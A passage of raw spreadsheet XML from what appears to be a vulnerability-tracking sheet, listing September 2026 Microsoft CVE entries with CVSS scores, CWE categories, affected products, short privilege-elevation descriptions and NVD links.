t="inlineStr"><is><t>New</t></is></c><c r="C994" s="5" t="inlineStr"><is><t>CVE-2026-70567</t></is></c><c r="D994" s="5" t="n"><v>7</v></c><c r="E994" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F994" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G994" s="5" t="inlineStr" /><c r="H994" s="5" t="n"><v>0.003</v></c><c r="I994" s="5" t="inlineStr" /><c r="J994" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K994" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L994" s="5" t="inlineStr" /><c r="M994" s="5" t="inlineStr" /><c r="N994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P994" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q994" s="5" t="inlineStr" /><c r="R994" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S994" s="5" t="inlineStr"><is><t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T994" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t></is></c></row><row r="995"><c r="A995" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C995" s="5" t="inlineStr"><is><t>CVE-2026-70568</t></is></c><c r="D995" s="5" t="n"><v>7</v></c><c r="E995" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F995" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G995" s="5" t="inlineStr" /><c r="H995" s="5" t="n"><v>0.003</v></c><c r="I995" s="5" t="inlineStr" /><c r="J995" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M995" s="5" t="inlineStr" /><c r="N995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P995" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q995" s="5" t="inlineStr" /><c r="R995" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S995" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T995" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t></is></c></row><row r="996"><c r="A996" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C996" s="5" t="inlineStr"><is><t>CVE-2026-70573</t></is></c><c r="D996" s="5" t="n"><v>7</v></c><c r="E996" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F996" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G996" s="5" t="inlineStr" /><c r="H996" s="5" t="n"><v>0.003</v></c><c r="I996" s="5" t="inlineStr" /><c r="J996" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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96" s="5" t="inlineStr" /><c r="M996" s="5" t="inlineStr" /><c r="N996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P996" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q996" s="5" t="inlineStr" /><c r="R996" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S996" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T996" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t></is></c></row><row r="997"><c r="A997" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C997" s="5" t="inlineStr"><is><t>CVE-2026-70577</t></is></c><c r="D997" s="5" t="n"><v>7</v></c><c r="E997" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F997" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G997" s="5" t="inlineStr" /><c r="H997" s="5" t="n"><v>0.003</v></c><c r="I997" s="5" t="inlineStr" /><c r="J997" s="5" t="inlineStr" /><c r="K997" s="5" t="inlineStr" /><c r="L997" s="5" t="inlineStr" /><c r="M997" s="5" t="inlineStr" /><c r="N997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P997" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q997" s="5" t="inlineStr" /><c r="R997" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S997" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T997" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t></is></c></row><row r="998"><c r="A998" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C998" s="5" t="inlineStr"><is><t>CVE-2026-70578</t></is></c><c r="D998" s="5" t="n"><v>7</v></c><c r="E998" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F998" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G998" s="5" t="inlineStr" /><c r="H998" s="5" t="n"><v>0.003</v></c><c r="I998" s="5" t="inlineStr" /><c r="J998" s="5" t="inlineStr" /><c r="K998" s="5" t="inlineStr" /><c r="L998" s="5" t="inlineStr" /><c r="M998" s="5" t="inlineStr" /><c r="N998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P998" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q998" s="5" t="inlineStr" /><c r="R998" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S998" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T998" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t></is></c></row><row r="999"><c r="A999" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C999" s="5" t="inlineStr"><is><t>CVE-2026-70585</t></is></c><c r="D999" s="5" t="n"><v>7</v></c><c r="E999" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F999" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G999" s="5" t="inlineStr" /><c r="H999" s="5" t="n"><v>0.003</v></c><c r="I999" s="5" t="inlineStr" /><c r="J999" s="5" t="inlineStr" /><c r="K999" s="5" t="inlineStr" /><c r="L999" s="5" t="inlineStr" /><c r="M999" s="5" t="inlineStr" /><c r="N999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P999" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q999" s="5" t="inlineStr" /><c r="R999" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S999" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t></is></c></row><row r="1000"><c r="A1000" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1000" s="5" t="inlineStr"><is><t>CVE-2026-71332</t></is></c><c r="D1000" s="5" t="n"><v>7</v></c><c r="E1000" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1000" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1000" s="5" t="inlineStr" /><c r="H1000" s="5" t="n"><v>0.003</v></c><c r="I1000" s="5" t="inlineStr" /><c r="J1000" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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00" s="5" t="inlineStr" /><c r="M1000" s="5" t="inlineStr" /><c r="N1000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1000" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1000" s="5" t="inlineStr" /><c r="R1000" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1000" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1000" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t></is></c></row><row r="1001"><c r="A1001" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1001" s="5" t="inlineStr"><is><t>CVE-2026-71333</t></is></c><c r="D1001" s="5" t="n"><v>7</v></c><c r="E1001" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1001" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1001" s="5" t="inlineStr" /><c r="H1001" s="5" t="n"><v>0.003</v></c><c r="I1001" s="5" t="inlineStr" /><c r="J1001" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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01" s="5" t="inlineStr" /><c r="M1001" s="5" t="inlineStr" /><c r="N1001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1001" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1001" s="5" t="inlineStr" /><c r="R1001" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1001" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1001" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t></is></c></row><row r="1002"><c r="A1002" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1002" s="5" t="inlineStr"><is><t>CVE-2026-71340</t></is></c><c r="D1002" s="5" t="n"><v>7</v></c><c r="E1002" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1002" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1002" s="5" t="inlineStr" /><c r="H1002" s="5" t="n"><v>0.003</v></c><c r="I1002" s="5" t="inlineStr" /><c r="J1002" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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02" s="5" t="inlineStr" /><c r="M1002" s="5" t="inlineStr" /><c r="N1002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1002" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1002" s="5" t="inlineStr" /><c r="R1002" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1002" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1002" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t></is></c></row><row r="1003"><c r="A1003" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1003" s="5" t="inlineStr"><is><t>CVE-2026-71342</t></is></c><c r="D1003" s="5" t="n"><v>7</v></c><c r="E1003" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1003" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1003" s="5" t="inlineStr" /><c r="H1003" s="5" t="n"><v>0.002</v></c><c r="I1003" s="5" t="inlineStr" /><c r="J1003" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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03" s="5" t="inlineStr" /><c r="M1003" s="5" t="inlineStr" /><c r="N1003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1003" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1003" s="5" t="inlineStr" /><c r="R1003" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1003" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1003" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t></is></c></row><row r="1004"><c r="A1004" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1004" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1004" s="5" t="inlineStr"><is><t>CVE-2026-71351</t></is></c><c r="D1004" s="5" t="n"><v>7</v></c><c r="E1004" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1004" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1004" s="5" t="inlineStr" /><c r="H1004" s="5" t="n"><v>0.003</v></c><c r="I1004" s="5" t="inlineStr" /><c r="J1004" s="5" t="inlineStr" /><c r="K1004" s="5" t="inlineStr" /><c r="L1004" s="5" t="inlineStr" /><c r="M1004" s="5" t="inlineStr" /><c r="N1004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1004" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1004" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1004" s="5" t="inlineStr" /><c r="R1004" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1004" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t></is></c></row><row r="1005"><c r="A1005" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1005" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1005" s="5" t="inlineStr"><is><t>CVE-2026-71353</t></is></c><c r="D1005" s="5" t="n"><v>7</v></c><c r="E1005" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1005" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1005" s="5" t="inlineStr" /><c r="H1005" s="5" t="n"><v>0.002</v></c><c r="I1005" s="5" t="inlineStr" /><c r="J1005" s="5" t="inlineStr" /><c r="K1005" s="5" t="inlineStr" /><c r="L1005" s="5" t="inlineStr" /><c r="M1005" s="5" t="inlineStr" /><c r="N1005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1005" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1005" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1005" s="5" t="inlineStr" /><c r="R1005" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1005" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t></is></c></row><row r="1006"><c r="A1006" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1006" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1006" s="5" t="inlineStr"><is><t>CVE-2026-72926</t></is></c><c r="D1006" s="5" t="n"><v>7</v></c><c r="E1006" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1006" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1006" s="5" t="inlineStr" /><c r="H1006" s="5" t="n"><v>0.003</v></c><c r="I1006" s="5" t="inlineStr" /><c r="J1006" s="5" t="inlineStr" /><c r="K1006" s="5" t="inlineStr" /><c r="L1006" s="5" t="inlineStr" /><c r="M1006" s="5" t="inlineStr" /><c r="N1006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1006" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1006" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1006" s="5" t="inlineStr" /><c r="R1006" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1006" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t></is></c></row><row r="1007"><c r="A1007" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1007" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1007" s="5" t="inlineStr"><is><t>CVE-2026-72930</t></is></c><c r="D1007" s="5" t="n"><v>7</v></c><c r="E1007" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1007" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1007" s="5" t="inlineStr" /><c r="H1007" s="5" t="n"><v>0.003</v></c><c r="I1007" s="5" t="inlineStr" /><c r="J1007" s="5" t="inlineStr" /><c r="K1007" s="5" t="inlineStr" /><c r="L1007" s="5" t="inlineStr" /><c r="M1007" s="5" t="inlineStr" /><c r="N1007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1007" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1007" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1007" s="5" t="inlineStr" /><c r="R1007" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1007" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t></is></c><c r="T1007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t></is></c></row><row r="1008"><c r="A1008" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1008" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1008" s="5" t="inlineStr"><is><t>CVE-2026-72952</t></is></c><c r="D1008" s="5" t="n"><v>7</v></c><c r="E1008" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1008" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1008" s="5" t="inlineStr" /><c r="H1008" s="5" t="n"><v>0.003</v></c><c r="I1008" s="5" t="inlineStr" /><c r="J1008" s="5" t="inlineStr" /><c r="K1008" s="5" t="inlineStr" /><c r="L1008" s="5" t="inlineStr" /><c r="M1008" s="5" t="inlineStr" /><c r="N1008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1008" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1008" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1008" s="5" t="inlineStr" /><c r="R1008" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1008" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T1008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t></is></c></row><row r="1009"><c r="A1009" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1009" s="5" t="inlineStr"><is><t>CVE-2026-72963</t></is></c><c r="D1009" s="5" t="n"><v>7</v></c><c r="E1009" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1009" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1009" s="5" t="inlineStr" /><c r="H1009" s="5" t="n"><v>0.003</v></c><c r="I1009" s="5" t="inlineStr" /><c r="J1009" s="5" t="inlineStr" /><c r="K1009" s="5" t="inlineStr" /><c r="L1009" s="5" t="inlineStr" /><c r="M1009" s="5" t="inlineStr" /><c r="N1009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1009" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1009" s="5" t="inlineStr" /><c r="R1009" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1009" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1009" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t></is></c></row><row r="1010"><c r="A1010" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1010" s="5" t="inlineStr"><is><t>CVE-2026-73003</t></is></c><c r="D1010" s="5" t="n"><v>7</v></c><c r="E1010" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1010" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1010" s="5" t="inlineStr" /><c r="H1010" s="5" t="n"><v>0.002</v></c><c r="I1010" s="5" t="inlineStr" /><c r="J1010" s="5" t="inlineStr" /><c r="K1010" s="5" t="inlineStr" /><c r="L1010" s="5" t="inlineStr" /><c r="M1010" s="5" t="inlineStr" /><c r="N1010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1010" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1010" s="5" t="inlineStr" /><c r="R1010" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1010" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1010" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t></is></c></row><row r="1011"><c r="A1011" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1011" s="5" t="inlineStr"><is><t>CVE-2026-73005</t></is></c><c r="D1011" s="5" t="n"><v>7</v></c><c r="E1011" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1011" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1011" s="5" t="inlineStr" /><c r="H1011" s="5" t="n"><v>0.002</v></c><c r="I1011" s="5" t="inlineStr" /><c r="J1011" s="5" t="inlineStr" /><c r="K1011" s="5" t="inlineStr" /><c r="L1011" s="5" t="inlineStr" /><c r="M1011" s="5" t="inlineStr" /><c r="N1011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1011" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1011" s="5" t="inlineStr" /><c r="R1011" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1011" s="5" t="inlineStr"><is><t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1011" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t></is></c></row><row r="1012"><c r="A1012" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1012" s="5" t="inlineStr"><is><t>CVE-2026-73022</t></is></c><c r="D1012" s="5" t="n"><v>7</v></c><c r="E1012" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1012" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1012" s="5" t="inlineStr" /><c r="H1012" s="5" t="n"><v>0.002</v></c><c r="I1012" s="5" t="inlineStr" /><c r="J1012" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1012"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12" s="5" t="inlineStr" /><c r="M1012" s="5" t="inlineStr" /><c r="N1012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1012" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1012" s="5" t="inlineStr" /><c r="R1012" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1012" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1012" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t></is></c></row><row r="1013"><c r="A1013" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1013" s="5" t="inlineStr"><is><t>CVE-2026-77485</t></is></c><c r="D1013" s="5" t="n"><v>7</v></c><c r="E1013" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1013" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1013" s="5" t="inlineStr" /><c r="H1013" s="5" t="n"><v>0.002</v></c><c r="I1013" s="5" t="inlineStr" /><c r="J1013" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1013" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1013" s="5" t="inlineStr" /><c r="M1013" s="5" t="inlineStr" /><c r="N1013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1013" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1013" s="5" t="inlineStr" /><c r="R1013" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1013" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t></is></c></row><row r="1014"><c r="A1014" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1014" s="5" t="inlineStr"><is><t>CVE-2026-77894</t></is></c><c r="D1014" s="5" t="n"><v>7</v></c><c r="E1014" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1014" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1014" s="5" t="inlineStr" /><c r="H1014" s="5" t="n"><v>0.002</v></c><c r="I1014" s="5" t="inlineStr" /><c r="J1014" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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4" s="5" t="inlineStr" /><c r="M1014" s="5" t="inlineStr" /><c r="N1014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1014" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1014" s="5" t="inlineStr" /><c r="R1014" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1014" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1014" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t></is></c></row><row r="1015"><c r="A1015" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1015" s="5" t="inlineStr"><is><t>CVE-2026-77897</t></is></c><c r="D1015" s="5" t="n"><v>7</v></c><c r="E1015" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1015" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1015" s="5" t="inlineStr" /><c r="H1015" s="5" t="n"><v>0.003</v></c><c r="I1015" s="5" t="inlineStr" /><c r="J1015" s="5" t="inlineStr" /><c r="K1015" s="5" t="inlineStr" /><c r="L1015" s="5" t="inlineStr" /><c r="M1015" s="5" t="inlineStr" /><c r="N1015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1015" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1015" s="5" t="inlineStr" /><c r="R1015" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1015" s="5" t="inlineStr"><is><t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t></is></c></row><row r="1016"><c r="A1016" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1016" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1016" s="5" t="inlineStr"><is><t>CVE-2026-77899</t></is></c><c r="D1016" s="5" t="n"><v>7</v></c><c r="E1016" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1016" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1016" s="5" t="inlineStr" /><c r="H1016" s="5" t="n"><v>0.002</v></c><c r="I1016" s="5" t="inlineStr" /><c r="J1016" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1016" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, 